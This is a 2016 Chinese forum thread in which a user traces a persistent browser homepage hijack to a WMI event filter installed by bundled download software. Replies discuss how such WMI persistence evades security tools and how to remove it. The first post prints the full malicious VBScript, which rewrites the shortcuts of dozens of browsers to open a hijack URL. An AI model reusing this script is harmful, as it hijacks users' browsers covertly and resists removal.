找回密码
 立即注册
搜索
查看: 8021|回复: 20

[软件] 现在的浏览器主页劫持已经进化到这种程度了?

[复制链接]
     
发表于 2016-10-6 12:01 | 显示全部楼层 |阅读模式
前几天在远景下了一个百度文库下载工具,运行时想看看有没有被流氓做手脚,果不其然点设置弹出一个“是否将hao123设为主页”的对话框,果断点了关闭。

然而次日开机后打开Firefox发现主页变成hao123了,从开始菜单启动IE发现没有类似问题,在Firefox浏览器设置里没发现改动的痕迹,检查快捷方式发现目标"C:\Program Files\Mozilla Firefox\firefox.exe"后缀添加了http://hk.jtsh123.com/,于是从安装目录直接启动程序发现没问题,就重新建了个快捷方式,并把那个百度文库下载工具卸载了。

结果今天开机发现主页又被改回hao123,于是在网上搜索了一下,方法不外乎那几种:
1、在快捷方式后添加想要设置的主页链接。然而这样治标不治本;
2、修改配置文件夹里的“user.js”文件。然而并没有这文件;
3、在注册表里搜索包含http://hk.jtsh123.com/的条目并修改。然而搜了半天还没搜出来只好作罢;
4、其他诸如重置Firefox、安装360、魔方等软件修复并没有尝试。

后来远景论坛有人说需通过WMI工具修改,然而微软官网下载这软件的页面已经没了,在其他网站找了几个,大多数运行程序看起来都很可疑的样子,好在终于找到一个正常的,安装后参照贴吧这个帖子http://tieba.baidu.com/p/4558542403,并没有找到_EventFilter:Name="unown_filter这项,进入_EventFilter:Name="SCM Event Log Filter"在ScriptText项发现如下字段:

On Error Resume Next:Const link = "http://hk.jtsh123.com/":Const link360 = "http://hk.jtsh123.com/s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Niclas\Desktop,C:\Users\Niclas\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Niclas\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Niclas\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Niclas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

直接在Value那栏置位或删除后重新打开字段依旧还在,只能删掉整个_EventFilter:Name="SCM Event Log Filter"项目,顺便把以上文本涉及到的路径全部排查删除了一遍,重启后暂时没出现这问题了。

本以为只是一个简单的问题,没想到花了我半天时间,难道真的要装个安全防护软件?顺便问问有没有靠谱干净的百度文库下载工具。
回复

使用道具 举报

发表于 2016-10-6 12:05 | 显示全部楼层
這個問題並不簡單 這類劫持都不止一個人做的.... 天天變種 殺毒也殺不來 要上沙箱
回复

使用道具 举报

     
发表于 2016-10-6 14:12 | 显示全部楼层
是奇怪老爸老妈的电脑总是主页劫持, 查又查不出什么问题, 原来是进化了
回复

使用道具 举报

头像被屏蔽
     
发表于 2016-10-6 14:17 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

     
发表于 2016-10-6 14:28 | 显示全部楼层
实在不行建议装个360,用大流氓把小流氓干掉之后再卸掉……
回复

使用道具 举报

发表于 2016-10-6 14:36 | 显示全部楼层
还有驱动级别的
回复

使用道具 举报

     
发表于 2016-10-6 14:52 来自手机 | 显示全部楼层
最简单的处理方法是给浏览器源程序改名字
记得360是管用的
手工清理看了不少帖子没一个行的
回复

使用道具 举报

发表于 2016-10-6 14:55 | 显示全部楼层
什麼时代了,hao123这种网站还需要推广啊
回复

使用道具 举报

     
发表于 2016-10-6 14:58 | 显示全部楼层
不就是WMI脚本劫持改主页么,好久之前就有了,比rootkit虚拟驱动改主页稍微高级一点,360之类安全软件管不了,最简单的处理就是禁用WMI服务。
回复

使用道具 举报

     
发表于 2016-10-6 15:07 来自手机 | 显示全部楼层
又是这个网站…我之前也被劫持 辣鸡卡巴解决不了最后下了个360扫到temp里有个bat 干死它就好了

—— 来自 htc m8wl, Android 6.0.1
回复

使用道具 举报

     
发表于 2016-10-6 15:10 | 显示全部楼层
之前用了某网站下的win10破解之后,好久才发现问题并且用WMI删掉相关内容后都会在一段事件后再出现,于是粗暴的重装系统了

而之所以我很久才发现是因为我常用的浏览器是waterfox而不用IE,直到装了360极速和chrome等别的浏览器后才发现有这个尾巴存在。
也就是说这个事件脚本会定期搜索系统中指向几个常用浏览器的快捷方式并加上hao123的尾巴,当快捷方式指向的文件不在常用浏览器之列时就不会改动,所以如果懒得深究的话完全可以直接把使用的浏览器的执行程序改名以回避修改……
回复

使用道具 举报

发表于 2016-10-6 15:14 | 显示全部楼层
搞个autoruns全部项都查一遍,我就不信他们不会在启动项动手脚
回复

使用道具 举报

     
发表于 2016-10-6 15:14 | 显示全部楼层
白左 发表于 2016-10-6 14:17
你应该检查:
1。是否有奇怪的插件
2。是否有奇怪的启动项

WMI劫持一不会添加启动项;二不会新增浏览器插件;三不会新增系统服务;修改主页的进程都是系统自带程序,防病毒软件不会报警,另外也不会在注册表和各个系统文件夹留下痕迹。

这类劫持因为相对难以发现而且免疫360/腾讯管家之类的主页修复工具,很多国产软件都喜欢捆绑,运行软件后会使用系统自带的WMI服务定时运行VB脚本文件,实现修改所有浏览器快捷方式的目的,执行过一次后不会留下痕迹。
回复

使用道具 举报

     
发表于 2016-10-6 15:15 | 显示全部楼层
superbigd 发表于 2016-10-6 15:14
搞个autoruns全部项都查一遍,我就不信他们不会在启动项动手脚

naive,你对流氓软件的认识还停留在10年前后~
回复

使用道具 举报

     
发表于 2016-10-6 17:17 来自手机 | 显示全部楼层
道高一尺魔高一丈,防不胜防
建议上sandboxie,永绝后患
回复

使用道具 举报

头像被屏蔽
     
发表于 2016-10-6 17:19 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

     
发表于 2016-10-6 17:30 | 显示全部楼层
会去远景下exe这智商我服
回复

使用道具 举报

发表于 2016-10-6 17:34 来自手机 | 显示全部楼层
电脑普及了,电脑知识却没有,移动领域更甚。
回复

使用道具 举报

发表于 2016-10-7 09:30 | 显示全部楼层
真搞不懂,hao123这种中国口碑最好的门户导航

到了百度手里要做这种流氓事,老用户都用了快20年了
何必呢
回复

使用道具 举报

     
发表于 2016-10-7 09:41 来自手机 | 显示全部楼层
hao123一直很流氓啊,当年还有把桌面的ie图标干掉,把自己的网页启动文件伪装成ie图标这样的神奇推广方法…

----发送自 Xiaomi Lenovo K50-t5,Android 5.0.2
回复

使用道具 举报

     
发表于 2016-10-9 10:20 | 显示全部楼层
我妈上网点着让我帮他把好123设成主页
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|上海互联网违法和不良信息举报中心|网上有害信息举报专区|962110 反电信诈骗|举报电话 021-62035905|Stage1st ( 沪ICP备13020230号-1|沪公网安备 31010702007642号 )

GMT+8, 2025-8-21 10:26 , Processed in 0.117774 second(s), 7 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表